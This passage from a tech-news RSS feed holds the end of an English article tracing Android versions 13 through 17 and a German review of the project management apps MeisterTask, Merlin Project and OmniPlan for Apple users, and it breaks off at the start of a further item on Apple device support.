<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img decoding="async" src="https://legacy-us-images.foundryco.app/images/article/2022/04/android-13-multitasking-100925567-orig.gif" alt="Android 13 Multitasking" class="wp-image-493989" loading="lazy" width="400px"><figcaption class="wp-element-caption">The new Android-13-introduced taskbar, as seen on a Google Pixel Fold phone.</figcaption></figure><p class="imageCredit">Google</p></div>



<p>On regular phones, Android 13 brought about far less noticeable changes — mostly just some enhancements to the system clipboard interface, a new native QR code scanning function within the Android Quick Settings area, and a smattering of under-the-hood improvements.</p>



<h2 class="wp-block-heading">Android version 14</h2>



<p>Following a full eight months of out-in-the-open refinement, Google’s 14th Android version landed at the start of October 2023, in the midst of the company’s <a href="https://www.computerworld.com/article/1636686/google-pixel-8-android.html">Pixel 8 and Pixel 8 Pro</a> launch event.</p>



<p>Like the version before it, Android 14 <a href="https://www.computerworld.com/article/1623187/google-android-14-boring.html">didn’t look like much on the surface</a>. That’s in part because of the trend of Google moving more and more toward a development cycle that revolves around smaller <a href="https://www.computerworld.com/article/1623187/google-android-14-boring.html">ongoing updates to individual system-level elements year-round</a> — something that’s actually <a href="https://www.computerworld.com/article/1615334/android-upgrade-advantage.html">a significant advantage for Android users</a>, even if it does have an awkward effect on people’s perception of progress.</p>



<p>But despite the subtle nature of its first impression, Android 14 delivered <a href="https://www.computerworld.com/article/1637026/google-pixel-android-14.html">a fair amount of noteworthy new goodies</a>. The software introduced a new system for dragging and dropping text between apps, for instance, as well as a number of new improvements to privacy and security — including a new settings-integrated dashboard for managing health and fitness data and a more info-rich and context-requiring system for seeing exactly <em>why </em>apps want access to your location. And it brought about a new set of native customization options for the Android lock screen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img decoding="async" src="https://legacy-us-images.foundryco.app/images/article/2023/10/android-versions-android-14-lock-screen-100947103-orig.jpg?quality=50&amp;strip=all" alt="android versions android 14 lock screen" class="wp-image-662008" loading="lazy" width="400px"><figcaption class="wp-element-caption"><p>Android 14 includes options for completely changing the appearance of the lock screen as well as for customizing which shortcuts show up on it.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<h2 class="wp-block-heading">Android version 15</h2>



<p>Though Android 15 followed the trend of significant advancements arriving as their own separate rollouts — <a href="https://www.computerworld.com/article/2088279/google-circle-to-search-google-android.html">outside of</a> and even <a href="https://www.computerworld.com/article/3550499/google-android-security-enhancements.html">ahead of</a> <em>its </em>arrival, as an official operating system update — 2024’s new Android version was certainly no slouch.</p>



<p>The software introduced <a href="https://www.computerworld.com/article/3564973/android-15-features-google-pixel-phone.html">a number of noteworthy new features</a> — including a redesigned system volume panel, an option to automatically re-enable a device’s Bluetooth radio a day after it’s been disabled, and a Pixel-specific Adaptive Vibration feature that intelligently adjusts a phone’s vibration intensity based on the environment. It also marked the debut of a system-level Private Space area that lets you keep sensitive apps out of sight and accessible only with authentication.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2024/10/android-version-15-private-space.jpg?quality=50&amp;strip=all&amp;w=1024" alt="android 15 private space feature" class="wp-image-3570907" width="1024" height="1024" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Once you set up Android 15’s new Private Space feature, certain apps appear in a special protected — and optionally hidden — area of your app drawer.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>Add in handy touches like a space-saving app archiving option and a predictive back visual that lets you sneak a peek at where you’re headed before you get there, and this small-seeming update shaped up to be a pretty hefty progression.</p>



<h2 class="wp-block-heading">Android version 16</h2>



<p>In a marked change from recent Android upgrade cycles, Google decided to go with <a href="https://www.computerworld.com/article/3803217/android-upgrades-2025.html"><em>two</em></a><a href="https://www.computerworld.com/article/3803217/android-upgrades-2025.html"> new Android versions per year</a> as of 2025 — starting with Android 16 in the spring and then following that with a smaller release in the fall.</p>



<p>True to that promise, Android 16 catapulted into the world in early June, creating the framework for future-facing systems such as <a href="https://blog.google/products/android/android-16/#:~:text=Streamlined%20and%20up-to-date%20notifications" target="_blank" rel="noreferrer noopener">Live Updates</a> — a new type of notification designed to support persistent, ongoing alerts, similar to what Apple does with iOS’s Live Activities — and introducing <a href="https://www.computerworld.com/article/4004401/android-16-advanced-protection-security.html">an Advanced Protection security supermode</a> that provides a simple single-switch way to activate a whole slew of advisable <a href="https://www.computerworld.com/article/1718177/android-settings-security.html">Android security settings</a> in one fell swoop.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/06/google-android-16-android-protection-security.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Android 16 Advanced Protection security" class="wp-image-4004452" width="1024" height="833" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>The Android 16 Advanced Security control panel, as seen on a Google Pixel phone.</p></figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>The update included a sprawling series of <a href="https://www.computerworld.com/article/3984225/android-reinvention-ai.html#:~:text=A%20new%20Advanced,system%20security%20settings">other new security strengtheners</a>, too, making protection seem like the true centerpiece of Android 16 — even if other touches, such as a more advanced standard for hearing aid support, helped flesh out the software into a rounded and feature-rich release.</p>



<h2 class="wp-block-heading">Android version 17</h2>



<p>With its <a href="https://blog.google/products-and-platforms/platforms/android/android-17-features" target="_blank" rel="noreferrer noopener">relatively low-key arrival</a> in June 2026, Android 17 officially brings the <a href="https://www.computerworld.com/article/4185786/google-pixel-android-17.html#:~:text=Android%2017%20Pixel%20feature%20%231%3A%20Bubbles%20multitasking%20magic">long under-development Bubbles multitasking system</a> to the Android-owning masses — adding an interesting new way to keep any app available on demand in a floating, collapsible window for easy ongoing access.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-bubbles_cb5ebb.gif" alt="animated screenshot of pressing bubble to switch between apps" class="wp-image-4186299" width="800" height="817" sizes="auto, (max-width: 800px) 100vw, 800px"><figcaption class="wp-element-caption"><p>Android 17’s Bubbles offers a whole new way to think about multitasking.</p>
</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Speaking of bubbliness, Android 17 also includes the creator-aimed option of showing a cutout of your face from a front-facing camera over an active screen recording — because why not, right? — along with such practical touches as <a href="https://www.computerworld.com/article/4185786/google-pixel-android-17.html#:~:text=Android%2017%20Pixel%20feature%20%233%3A%20More%20dynamic%20dark%20mode">a more dynamic and consistent system-wide dark mode</a> and a <a href="https://www.computerworld.com/article/4185786/google-pixel-android-17.html#:~:text=Android%2017%20Pixel%20feature%20%232%3A%20Smarter%20location%20access">more nuanced and effective way to track and control app location access</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-location-indicator.png?w=1024" alt="Android 17 Location Indicator screens with manage access button" class="wp-image-4185803" width="1024" height="847" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Managing app location access is extra easy <em>and</em> powerful in Android 17.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>While those features and the inevitable slew of under-the-hood security, performance, and privacy improvements add up to form a compelling final picture, it’s hard not to notice that much of Google’s focus in this era is now on the AI layers <em>surrounding</em> Android as opposed to being on Android itself, as an operating system. The company’s I/O conference in May showcased <a href="https://blog.google/products-and-platforms/platforms/android/gemini-intelligence/" target="_blank" rel="noreferrer noopener">many such measures</a>, appropriately noting that Android was transitioning from being “an operating system” into being “an intelligence system” (whatever that means).</p>



<p>Most of those “intelligence system” items remain limited in ability or not yet available as of the time of Android 17’s release — like <a href="https://blog.google/products-and-platforms/platforms/android/gemini-intelligence/#:~:text=Turn%20spoken%20thoughts%20into%20polished%20text" target="_blank" rel="noreferrer noopener">the new and improved speech-to-text system for Gboard</a>, the <a href="https://blog.google/products-and-platforms/platforms/android/gemini-intelligence/#:~:text=Build%20custom%20widgets" target="_blank" rel="noreferrer noopener">custom-widget-creating system for Android phones</a>, and the <a href="https://blog.google/products-and-platforms/platforms/android/gemini-intelligence/#:~:text=Automate%20multi-step%20tasks%20across%20your%20apps" target="_blank" rel="noreferrer noopener">multistep automation system for allowing AI to complete complex tasks on your behalf</a> (assuming that you (a) <a href="https://www.computerworld.com/article/4136922/google-gemini-3-years.html">trust such a system</a> to act on your behalf and (b) don’t find the level of access and resulting manner of assumptions it makes about your life <a href="https://www.computerworld.com/article/4182583/ai-creepy-era.html">to be overly creepy</a>).</p>



<p>But even at its foundational level and without any <a href="https://blog.google/products-and-platforms/platforms/android/android-halo/" target="_blank" rel="noreferrer noopener">AI-laden Halo effect</a> included, Android 17 manages to hold its own — with Bubbles acting as an anchor and bringing some much-appreciated new productivity potential our way.</p>



<p><em>This article was originally published in November 2017 and most recently updated in June 2026.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Projektmanagement-Software: 3 Pflicht-Apps für Apple-Nutzer]]></title>
<description><![CDATA[Diese Projektmanagement-Apps empfehlen sich für Apple-Nutzer. 
					Foto: SFIO CRACHO – shutterstock.com




Haben Sie sich jemals gefragt, warum Hochzeitsplaner so viel Geld verlangen können? Der Grund liegt in der Komplexität der Aufgabe: Es gilt die unterschiedlichsten Bausteine zu organisiere...]]></description>
<link>https://tsecurity.de/de/3600604/it-security-nachrichten/projektmanagement-software-3-pflicht-apps-fuer-apple-nutzer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600604/it-security-nachrichten/projektmanagement-software-3-pflicht-apps-fuer-apple-nutzer/</guid>
<pubDate>Tue, 16 Jun 2026 06:05:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Diese Projektmanagement-Apps empfehlen sich für Apple-Nutzer. " title="Diese Projektmanagement-Apps empfehlen sich für Apple-Nutzer. " src="https://images.computerwoche.de/bdb/3337741/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Diese Projektmanagement-Apps empfehlen sich für Apple-Nutzer. </p></figcaption></figure><p class="imageCredit">
					Foto: SFIO CRACHO – shutterstock.com</p></div>




<p>Haben Sie sich jemals gefragt, warum Hochzeitsplaner so viel Geld verlangen können? Der Grund liegt in der Komplexität der Aufgabe: Es gilt die unterschiedlichsten Bausteine zu organisieren und viele potenzielle Fehlerquellen zu vermeiden. Viele große Unternehmensprojekte ähneln in ihrem Komplexitätsgrad einer Hochzeit: Auch sie bestehen aus zahlreichen Aufgaben mit vielen potenziellen Schwachstellen und enthalten oft Abhängigkeitsbeziehungen, die so kompliziert sind, dass ein kleines Detail das gesamte Vorhaben <a href="https://www.computerwoche.de/article/2802656/darum-scheitern-it-projekte.html" title="zum Scheitern bringen" target="_blank">zum Scheitern bringen</a> oder <a href="https://www.cio.de/a/wann-sie-ihr-projekt-killen-sollten,3562789" title="verzögern kann" target="_blank">verzögern kann</a> – mit katastrophalen Folgen.</p>



<p><a href="https://www.computerwoche.de/article/2795036/wie-pms-sich-selbst-beluegen.html" title="Projektmanager" target="_blank">Projektmanager</a> haben sich schon immer auf Hilfsmittel verlassen, um Projektteams zusammenzuhalten, den Überblick zu wahren und Fortschritte zu überwachen. In der Vergangenheit waren das Spreadsheets, Schautafeln und sogar maßstabsgetreue Modelle. Heutzutage läuft das digital. <a href="https://www.computerwoche.de/article/2609720/die-besten-projektmanagement-tools.html" title="Projektmanagement-Software" target="_blank">Projektmanagement-Software</a> bietet heute eine breite Palette an Tools, wobei die verschiedenen Werkzeuge mehr oder weniger gut für unterschiedliche Aufgaben geeignet sind. Manager großer Projekte verlassen sich oft auf Microsoft Project, aber diese Option steht Anwendern mit Apple-basierter Unternehmenstechnologie nicht ohne weiteres zur Verfügung.</p>



<p>Im Folgenden stellen wir Ihnen drei Mac- und <a href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank" class="idgGlossaryLink">iPhone</a>-freundliche Alternativen für Projektmanagement und Collaboration vor, die die wesentlichen Funktionen von Microsoft Project bieten.</p>



<h2 class="wp-block-heading"><a href="https://www.meistertask.com/de" target="_blank" rel="noreferrer noopener">MeisterTask</a></h2>



<p>MeisterTask wurde erstmals im Jahr 2015 veröffentlicht und ist eine leistungsstarke Projektmanagement-Software, die auf drei primären Interfaces basiert: Dashboard, Projekte und Aufgaben. Das 2006 in Deutschland gegründete Softwareunternehmen Meister hat MeisterTask als europäische Alternative zu <a title="Trello" href="https://www.computerwoche.de/article/2806372/was-ist-trello.html" target="_blank">Trello</a> in Stellung gebracht, die dem Hersteller zufolge vollständig <a title="DSGVO-konform" href="https://www.computerwoche.de/article/2798126/welche-kontrollen-die-dsgvo-erlaubt.html" target="_blank">DSGVO-konform</a> ist.</p>



<p>MeisterTask bietet eine Reihe von Ansichten, darunter sowohl Gantt-/Timeline-Ansichten als auch <a href="https://www.computerwoche.de/article/2793573/was-scrum-von-kanban-unterscheidet.html" title="Kanban-Boards" target="_blank">Kanban-Boards</a>, die dabei helfen, den Fortschritt eines Projekts in einem eingängigen visuellen Stil zu verfolgen. Die Tafeln sind anpassbar, so dass Sie die Art der Projektdurchführung an der Arbeitsweise Ihrer Teams ausrichten können. Tasks werden mit Hilfe von Karten verwaltet (zum Beispiel “Offen”, “In Bearbeitung” und “Erledigt”), die über Spalten auf der Projekttafel verschoben werden können. Sie fügen neue Projekte hinzu, indem Sie auf die Schaltfläche “+” tippen und sich dann durch zahlreiche Einrichtungsoptionen arbeiten. MeisterTask unterstützt eine unbegrenzte Anzahl von Projekten, Aufgaben und Beteiligten und verfügt über ein Benachrichtigungssystem.</p>



<p>Darüber hinaus bietet das Tool auch folgende leistungsfähige Features: Die Aufgabenautomatisierung hilft Ihnen dabei, Workflows zu erstellen. Die Möglichkeit, relevante Kommunikation und Dateien innerhalb Ihrer Aufgabe zu speichern, ist sehr komfortabel. Zur Kontrolle wichtiger Projektziele kann die Option, bestimmte Aufgaben zu beobachten, herangezogen werden. Verknüpfungen zwischen einzelnen Aufgaben zu erstellen, ist ebenfalls hilfreich. Wenn Sie etwas tiefer graben, finden Sie außerdem Tools zur Zeiterfassung, zur Berichterstellung und zur Recherche. Bei den meisten Projekten verwenden mehrere Teams gleich mehrere Anwendungen für ihren Arbeitsablauf. MeisterTask unterstützt das mit Integrationen zu anderen vielgenutzten Apps, darunter:</p>



<ul class="wp-block-list">
<li><p>Zendesk,</p></li>



<li><p>Slack,</p></li>



<li><p>Spark,</p></li>



<li><p>Teams,</p></li>



<li><p>Microsoft 365 Groups,</p></li>



<li><p>Outlook,</p></li>



<li><p>Google Workspace,</p></li>



<li><p>Dropbox,</p></li>



<li><p>Box,</p></li>



<li><p>IFTTT,</p></li>



<li><p>GitHub,</p></li>



<li><p>Harvest und mehr.</p></li>
</ul>



<p>Es unterstützt auch Zapier, mit dem Sie komplexe Workflows erstellen können, die in Ihre Projektmanagement-Matrix einfließen. Die meistgenutzten Funktionen von MeisterTask sind wahrscheinlich, E-Mails automatisch in Tasks umzuwandeln, sowie Benachrichtigungen zu erhalten, wenn eine Aufgabe verschoben wird.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="MeisterTask läuft auf allen Apple-Geräten." title="MeisterTask läuft auf allen Apple-Geräten." src="https://images.computerwoche.de/bdb/3337742/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">MeisterTask läuft auf allen Apple-Geräten.</p></figcaption></figure><p class="imageCredit">
					Foto: MeisterTask</p></div>




<p>Das kürzlich eingeführte Reporting-Tool kann helfen, potenzielle Probleme in einem Projekt zu identifizieren, Aufgaben neu zuzuordnen und die Produktivität des Teams zu messen. Anhand dieser Berichte können Sie sich schnell einen Überblick darüber verschaffen, was gerade für Sie ansteht. Die Agenda-Funktion funktioniert ähnlich wie Trello: Sie können Aufgaben aus jedem Projekt in Ihrer Agenda anheften und Abschnitte für verschiedene Aufgaben oder Bedürfnisse erstellen. Die Agenda schlägt zudem Aufgaben vor, die Sie hinzufügen könnten. Diese Funktion ist nützlich, um mehrere Aufgaben aus unterschiedlichen Projekten zu verfolgen. Sie ist aber den kostenpflichtigen Versionen vorbehalten.</p>



<p>Bei der Arbeit mit MeisterTask gibt es auch einige Hürden: Zwar ist die Benutzeroberfläche ansprechend und intuitiv, aber das erste Projekt zu erstellen, dauert oft länger als erdacht. Detaileinstellungen und bestimmte Funktionen sind schwer zu finden. MeisterTask ist zwar ein sehr guter Helfer in Sachen <a href="https://www.computerwoche.de/article/2793117/hybrides-projektmanagement-echte-alternative.html" title="Projektmanagement" target="_blank">Projektmanagement</a>, wahrscheinlich werden Sie sich dennoch hin und wieder mehr mit der App selbst als mit dem eigentlichen Projekt beschäftigen müssen.</p>



<p><strong>Pro:</strong></p>



<ul class="wp-block-list">
<li><p>mit dem Dashboard können Sie in alle Ihre Projekte hineinzoomen</p></li>



<li><p>die Agenda-Funktion ist sehr nützlich, aber nur in den Pro-Versionen verfügbar</p></li>



<li><p>Collaboration-Tools sind integriert</p></li>
</ul>



<p><strong>Contra:</strong></p>



<ul class="wp-block-list">
<li><p>komplizierter Einstieg</p></li>



<li><p>noch nicht im Mac App Store erhältlich, obwohl eine iOS-App existiert</p></li>
</ul>



<p><strong>Preis:</strong></p>



<ul class="wp-block-list">
<li><p>kostenlos für bis zu drei Projekte; <a title="kostenpflichtige Versionen" href="https://accounts.meister.co/payments/mt/de/pricing?_sp=f940e846-2905-47f7-8c5d-dc85e08fec06.1699869628174" target="_blank" rel="noopener">kostenpflichtige Versionen</a> ab 13,50 Euro monatlich</p></li>
</ul>



<p><strong>Unterstützte Plattformen:</strong></p>



<ul class="wp-block-list">
<li><p>Windows- und macOS-Nutzer können von vielen Browsern aus auf die Webversion zugreifen, und für beide Plattformen ist ein nativer Wrapper verfügbar; eine mobile App ist für iOS, iPadOS und Android verfügbar</p></li>
</ul>



<h2 class="wp-block-heading"><a href="https://www.projectwizards.net/de" target="_blank" rel="noreferrer noopener">Merlin Project</a></h2>



<p>Merlin Project wurde eigens für Mac-, <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/ipad,3456" target="_blank">iPad</a>– und <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank">iPhone</a>-User entwickelt und ist ein gut ausgestattetes, professionelles Projektmanagement-Tool mit einer breiten Palette von Funktionen, die Ihnen bei der Erstellung effektiver Arbeits- und Projektgliederungen zur Hand gehen. Das Tool des deutschen Herstellers ProjectWizards bietet Nutzern eine große Auswahl an leicht zugänglichen Projektdarstellungen, darunter <a title="Gantt-Diagramme" href="https://www.computerwoche.de/article/2773834/gantt-diagramme-im-projektmanagement-nutzen.html" target="_blank">Gantt-Diagramme</a>, PERT, Kanban und viele mehr. Besonders ansprechend ist die Option, eine <a title="Mind Map" href="https://www.computerwoche.de/article/2611907/zehn-kostenlose-mind-mapping-tools.html" target="_blank">Mind Map</a> zur Visualisierung Ihres Projekts zu verwenden, welche dann zur weiteren Verfeinerung in ein Gantt-Diagramm umgewandelt werden kann.</p>



<p>Die Funktionen von Merlin Project für Ressourcenmanagement und Abhängigkeitsbeziehungen sind leicht zu finden und zu verstehen. Teamleiter sollten auch das Zuweisungstool erkunden, mit dem sich alles von Budget und Zeitplan bis hin zur Verteilung von Aufgaben nachvollziehen lässt. Aufgaben werden über ein Inspektionsfenster bearbeitet, das sich intuitiv anfühlt. Sie wählen ein Element aus und sehen dessen relevante Details oder Sie geben die Kosten für jede Projektkomponente ein und können die Verfügbarkeit analysieren. Die Fenster sind im Allgemeinen übersichtlich gehalten, obwohl nicht immer auf Anhieb ersichtlich ist, welchen Button man betätigen muss. Dankenswerterweise haben die Entwickler einen <a href="https://www.projectwizards.net/en/support/documentation/merlin-project/quickguide" title="umfangreichen Pool an Tutorial-Ressourcen" target="_blank" rel="noopener">umfangreichen Pool an Tutorial-Ressourcen</a> zusammengestellt.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Merlin Project überführt Mind Mapping in die digitale Neuzeit. " title="Merlin Project überführt Mind Mapping in die digitale Neuzeit. " src="https://images.computerwoche.de/bdb/3337743/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Merlin Project überführt Mind Mapping in die digitale Neuzeit. </p></figcaption></figure><p class="imageCredit">
					Foto: Merlin Project</p></div>




<p>Die meisten Projekte bestehen aus verschiedenen Organisationsebenen. Da die Arbeitswelt immer asynchroner wird, müssen <a href="https://www.computerwoche.de/article/2767476/9-tipps-fuer-das-management-von-remote-teams.html" title="Remote-Projektmanagement-Tools" target="_blank">Remote-Projektmanagement-Tools</a> diesem Umstand Rechnung tragen. Merlin Project unterstützt diese Entwicklung unter anderem, indem es Multi-User-Support bereitstellt. So können Mitarbeiter auch offline an Projektdateien weiterarbeiten, die Änderungen werden synchronisiert, wenn sie das nächste Mal online sind. Etwas eingeschränkt funktioniert das projektinterne Kommunikationssystem. </p>



<p>Sie können zwar zu nahezu überall Kommentare oder Anmerkungen hinzufügen und das Projektmanagement automatisieren, aber die Integration anderer Messaging- oder Notiz-Apps würde mehr Flexibilität ermöglichen. Die Integration von anderen Anwendungen scheint insgesamt etwas begrenzt zu sein. Zwar sind alle Basisanwendungen von Apple, sowie Microsoft Office und Microsoft Project integriert, aber Merlin arbeitet nicht optimal mit Slack und anderen <a href="https://www.computerwoche.de/article/2794966/dokumente-gemeinsam-bearbeiten.html" title="Collaboration Tools" target="_blank">Collaboration Tools</a> zusammen.</p>



<p>Sie können Merlin Project mit Cloud-Diensten wie iCloud Drive, Dropbox und Box synchronisieren (aus irgendeinem Grund allerdings nur Dropbox und iCloud Drive auf dem iPad). Die Funktion “MagicSync” synchronisiert Änderungen über mehrere Benutzer hinweg.</p>



<p><strong>Pro:</strong></p>



<ul class="wp-block-list">
<li><p>bietet zahlreiche Optionen, um ein Projekt ausgehend von der Visualisierung umzusetzen</p></li>



<li><p>enthält Mind-Mapping-Tools sowie Kanban-, Projekt- und Gantt-Ansichten</p></li>



<li><p>Import und Export in Microsoft Project, Excel, XML, OPML, MindManager und andere Formate möglich</p></li>
</ul>



<p><strong>Contra:</strong></p>



<ul class="wp-block-list">
<li><p>relativ eingeschränktes In-App-Nachrichten- und Kommentarsystem</p></li>



<li><p>fehlende Integration von anderen Apps wie Slack</p></li>
</ul>



<p><strong>Preis:</strong></p>



<ul class="wp-block-list">
<li><p>199,99 Euro pro Anwender und Jahr auf dem Mac und 9,99 Euro pro User und Monat auf iPhone und iPad; die abgespeckte Basis-Version <a title="Merlin Project Express" href="https://www.projectwizards.net/de/pricelist" target="_blank" rel="noopener">Merlin Project Express</a> steht ab 4,99 Euro zur Verfügung</p></li>
</ul>



<p><strong>Unterstützte Plattformen:</strong></p>



<ul class="wp-block-list">
<li><p>macOS, iPadOS und iOS</p></li>
</ul>



<h2 class="wp-block-heading"><a href="https://www.omnigroup.com/omniPlan" target="_blank" rel="noreferrer noopener">OmniPlan</a></h2>



<p>OmniPlan ist ein Tool, das laut dem US-Hersteller Omni Group alles bieten soll, was Sie für die Projektabwicklung benötigen. Wenn Sie Erfahrung im Umgang mit Software auf den Apple-Plattformen haben, hilft Ihnen OmniPlan dabei, schnell loszulegen, denn alle komplexen Werkzeuge, die Sie im <a title="Projektmanagement" href="https://www.computerwoche.de/article/2805740/was-pms-jetzt-koennen-muessen.html" target="_blank">Projektmanagement</a> erwarten, sind bei Bedarf verfügbar. Das soll mitnichten heißen, dass es sich bei OmniPlan um ein simples Stück Software handelt. Trotz der übersichtlichen Oberfläche ist nämlich nicht jede Einstellung leicht zu finden. Glücklicherweise wird OmniPlan von einem umfangreichen Handbuch flankiert, das Ihnen hilft, den Weg zu den benötigten Funktionen zu finden.</p>



<p>Die Anwendung verfügt über Werkzeuge für die Ressourcenzuweisung, Projektplanung, Diagramme, Gantt-Ansichten, wiederkehrende und manuelle Aufgaben sowie ein Dateiformat, das für eine bessere Kompatibilität mit Cloud-Diensten von Drittanbietern und mit iCloud entwickelt wurde. Auch der Wechsel zwischen <a href="https://www.computerwoche.de/k/ipad,3456" target="_blank" class="idgGlossaryLink">iPad</a> und Mac funktioniert problemlos – die Benutzeroberfläche ist auf beiden Plattformen nahezu identisch. OmniPlan ist daneben ein gutes Tool für die effektive Verwaltung komplexer Aufgaben, unter anderem, indem es Ansichten verwendet, die Abhängigkeitsbeziehungen und Kollisionen sichtbar machen. Eine hinreichende Datenbasis vorausgesetzt, lassen sich mit OmniPlan sogar Ihre Nebenkosten, die Produktivität Ihrer Mitarbeiter und die Verfügbarkeit wichtiger Geräte erfassen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Mit OmniPlan sind Ihren Projektmanagement-Künsten kaum Grenzen gesetzt. " title="Mit OmniPlan sind Ihren Projektmanagement-Künsten kaum Grenzen gesetzt. " src="https://images.computerwoche.de/bdb/3337744/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Mit OmniPlan sind Ihren Projektmanagement-Künsten kaum Grenzen gesetzt. </p></figcaption></figure><p class="imageCredit">
					Foto: OmniPlan</p></div>




<p>Die Projektmanagement Software bietet auch einige außergewöhnliche Funktionen. Mit OmniPlan können Sie beispielsweise jedem Teammitglied ein Maß für die Effektivität zuweisen. Dies soll dem Umstand Rechnung tragen, dass erfahrenere Mitarbeiter effizienter und mitunter in der Lage sind, auch schwierige Tasks an einem Tag zu bewältigen, während ein unerfahrener Mitarbeiter vielleicht eine Woche braucht. Rechts vom Hauptfenster befindet sich der Projektinspektor mit den Werkzeugen, die Sie für die Konfiguration der einzelnen Aufgabenkomponenten benötigen. Außerdem werden wertvolle Informationen wie die Dauer der Aufgabe, ihr Fälligkeitsdatum und der Gesamtaufwand der Mitarbeiter für diesen Projektteil in einer Übersicht erfasst.</p>



<p>Die <a href="https://www.computerwoche.de/article/2713944/5-regeln-fuer-die-erstellung-von-dashboards.html" title="Dashboard" target="_blank">Dashboard</a>-Ansicht berücksichtigt die simultane Arbeit an mehreren Projekten und präsentiert Ihre aktuellen Projekte und deren Fortschritt. Wenn Sie feststellen, dass ein Projekt nicht planmäßig verläuft, können Sie die einzelnen Elemente in dieser Ansicht vergrößern, um Probleme zu erkennen und Ressourcen neu zuzuweisen. OmniPlan bietet auch eine Monte-Carlo-Simulation, also einen integrierten Stresstest, der die Wahrscheinlichkeit dafür errechnet, dass Sie Ihr Projekt pünktlich fertigstellen. Das geschieht auf Grundlage einer Fehleranalyse, sobald einzelne Schritte Ihres Plans ins Stocken geraten. </p>



<p>Die Automatisierungoption ist eine weitere Spezialfunktion, die für Projektmanager mit Programmierkenntnissen eine große Hilfe sein dürfte. Damit können Sie direkt in Ihrem Projekt <a href="https://www.computerwoche.de/article/2793823/wie-automatisierung-sich-rechnet.html" title="Automatisierungen" target="_blank">Automatisierungen</a> erstellen, die plattformübergreifend zur Verfügung stehen: Mac-Automatisierungen in JavaScript laufen auch auf <a href="https://www.computerwoche.de/k/ipad,3456" target="_blank" class="idgGlossaryLink">iPad</a> und <a href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank" class="idgGlossaryLink">iPhone</a>. Was OmniPlan hingegen fehlt, ist eine Mind-Mapping-Ansicht.</p>



<p><strong>Pro:</strong></p>



<ul class="wp-block-list">
<li><p>leicht zugängliche Benutzeroberfläche für PowerUser</p></li>



<li><p>enthält mehrere Projektansichten, darunter Kanban, Netzplan und Gantt</p></li>



<li><p>spezielle Automatisierungswerkzeuge für fortgeschrittene Benutzer </p></li>
</ul>



<p><strong>Contra:</strong></p>



<ul class="wp-block-list">
<li><p>kein integriertes Mindmapping Tool</p></li>



<li><p>fehlende Integration von Apps wie Slack</p></li>



<li><p>kein Web-Interface für plattformübergreifende Zusammenarbeit</p></li>
</ul>



<p><strong>Preis:</strong></p>



<ul class="wp-block-list">
<li><p><a title="Klassische Lizenz" href="https://www.omnigroup.com/omniPlan/buy/" target="_blank" rel="noopener">Klassische Lizenz</a> für 399 Dollar (Pro-Version) beziehungsweise Subscription für 199,99 Dollar pro Jahr</p></li>
</ul>



<p><strong>Unterstützte Plattformen:</strong></p>



<ul class="wp-block-list">
<li><p>macOS, iPadOS, iOS</p></li>
</ul>



<p><strong>Dieser Artikel ist <a href="https://www.computerworld.com/article/1614697/3-solid-project-management-apps-for-ios-and-mac.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Computerworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Officially Ends Software Support For 16 Devices This Fall]]></title>
<description><![CDATA[Apple will stop providing software updates for 16 devices across four product lines this fall. When it rolls out its new operating systems at the end of the year, several watches, tablets, computers, and media players will be left behind. Fortunately, phones are safe, as the upcoming iOS 27 maint...]]></description>
<link>https://tsecurity.de/de/3599878/ios-mac-os/apple-officially-ends-software-support-for-16-devices-this-fall/</link>
